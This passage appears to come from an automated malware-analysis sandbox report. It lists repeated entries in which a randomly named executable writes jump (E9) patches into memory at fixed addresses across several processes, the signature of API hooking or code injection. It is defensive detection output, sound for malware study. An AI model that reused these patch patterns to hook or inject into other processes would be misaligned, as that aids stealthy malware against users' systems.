            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 69CBA9B0 value: E9 3B 6D 56 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 69CA572C value: E9 AF C0 57 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 769A6C19 value: E9 32 06 88 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 769A4889 value: E9 82 D4 87 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 76A91D20 value: E9 7B 03 79 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 76A0BF10 value: E9 4B 62 81 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 76A81610 value: E9 8B 0D 7A 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 774D0078 value: E9 53 53 D5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 816 base: 774EEB2A value: E9 D1 67 D3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 774CFA50 value: E9 3B 69 E5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 774CFDA8 value: E9 93 68 E5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 757158CD value: E9 2E B7 C0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 757182ED value: E9 AE 8D C0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 7576DF21 value: E9 EA 45 BB 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 75709AE0 value: E9 8B 8A C1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 756F5366 value: E9 55 BE C2 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 756F3EFC value: E9 8F D3 C2 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 69CBA9B0 value: E9 3B 6D 66 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 69CA572C value: E9 AF C0 67 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 769A6C19 value: E9 32 06 98 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 769A4889 value: E9 82 D4 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 76A91D20 value: E9 7B 03 89 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 76A0BF10 value: E9 4B 62 91 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 76A81610 value: E9 8B 0D 8A 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 774D0078 value: E9 53 53 E5 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1012 base: 774EEB2A value: E9 D1 67 E3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 774CFA50 value: E9 3B 69 04 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 774CFDA8 value: E9 93 68 04 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 757158CD value: E9 2E B7 DF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 757182ED value: E9 AE 8D DF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 7576DF21 value: E9 EA 45 DA 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 75709AE0 value: E9 8B 8A E0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 756F5366 value: E9 55 BE E1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 756F3EFC value: E9 8F D3 E1 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 69CBA9B0 value: E9 3B 6D 85 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 69CA572C value: E9 AF C0 86 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 769A6C19 value: E9 32 06 B7 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 769A4889 value: E9 82 D4 B6 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 76A91D20 value: E9 7B 03 A8 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 76A0BF10 value: E9 4B 62 B0 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 76A81610 value: E9 8B 0D A9 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 774D0078 value: E9 53 53 04 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1668 base: 774EEB2A value: E9 D1 67 02 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 774CFA50 value: E9 3B 69 CC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 774CFDA8 value: E9 93 68 CC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 757158CD value: E9 2E B7 A7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 757182ED value: E9 AE 8D A7 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 7576DF21 value: E9 EA 45 A2 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 75709AE0 value: E9 8B 8A A8 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 756F5366 value: E9 55 BE A9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 756F3EFC value: E9 8F D3 A9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 69CBA9B0 value: E9 3B 6D 4D 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 69CA572C value: E9 AF C0 4E 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 769A6C19 value: E9 32 06 7F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 769A4889 value: E9 82 D4 7E 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 76A91D20 value: E9 7B 03 70 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 76A0BF10 value: E9 4B 62 78 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 76A81610 value: E9 8B 0D 71 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 774D0078 value: E9 53 53 CC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2836 base: 774EEB2A value: E9 D1 67 CA 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 774CFA50 value: E9 3B 69 37 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 774CFDA8 value: E9 93 68 37 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 757158CD value: E9 2E B7 12 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 757182ED value: E9 AE 8D 12 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 7576DF21 value: E9 EA 45 0D 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 75709AE0 value: E9 8B 8A 13 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 756F5366 value: E9 55 BE 14 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 756F3EFC value: E9 8F D3 14 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 69CBA9B0 value: E9 3B 6D B8 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 69CA572C value: E9 AF C0 B9 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 769A6C19 value: E9 32 06 EA 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 769A4889 value: E9 82 D4 E9 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 76A91D20 value: E9 7B 03 DB 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 76A0BF10 value: E9 4B 62 E3 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 76A81610 value: E9 8B 0D DC 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 774D0078 value: E9 53 53 37 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 1756 base: 774EEB2A value: E9 D1 67 35 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 774CFA50 value: E9 3B 69 F3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 774CFDA8 value: E9 93 68 F3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 757158CD value: E9 2E B7 CE 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 757182ED value: E9 AE 8D CE 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 7576DF21 value: E9 EA 45 C9 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 75709AE0 value: E9 8B 8A CF 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 756F5366 value: E9 55 BE D0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 756F3EFC value: E9 8F D3 D0 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 69CBA9B0 value: E9 3B 6D 74 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 69CA572C value: E9 AF C0 75 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 769A6C19 value: E9 32 06 A6 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 769A4889 value: E9 82 D4 A5 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 76A91D20 value: E9 7B 03 97 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 76A0BF10 value: E9 4B 62 9F 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 76A81610 value: E9 8B 0D 98 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 774D0078 value: E9 53 53 F3 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2672 base: 774EEB2A value: E9 D1 67 F1 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 774CFA50 value: E9 3B 69 35 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 774CFDA8 value: E9 93 68 35 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 757158CD value: E9 2E B7 10 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 757182ED value: E9 AE 8D 10 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 7576DF21 value: E9 EA 45 0B 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 75709AE0 value: E9 8B 8A 11 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 756F5366 value: E9 55 BE 12 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 756F3EFC value: E9 8F D3 12 8B Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 69CBA9B0 value: E9 3B 6D B6 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 69CA572C value: E9 AF C0 B7 96 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 769A6C19 value: E9 32 06 E8 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 769A4889 value: E9 82 D4 E7 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 76A91D20 value: E9 7B 03 D9 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 76A0BF10 value: E9 4B 62 E1 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 76A81610 value: E9 8B 0D DA 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 774D0078 value: E9 53 53 35 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2708 base: 774EEB2A value: E9 D1 67 33 89 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 774CFA50 value: E9 3B 69 BC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 774CFDA8 value: E9 93 68 BC 88 Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 757158CD value: E9 2E B7 97 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 757182ED value: E9 AE 8D 97 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 7576DF21 value: E9 EA 45 92 8A Jump to behavior
            Source: C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exeMemory written: PID: 2704 base: 75709AE0 value: E9 8B 8A 98 8A Jump to behavior
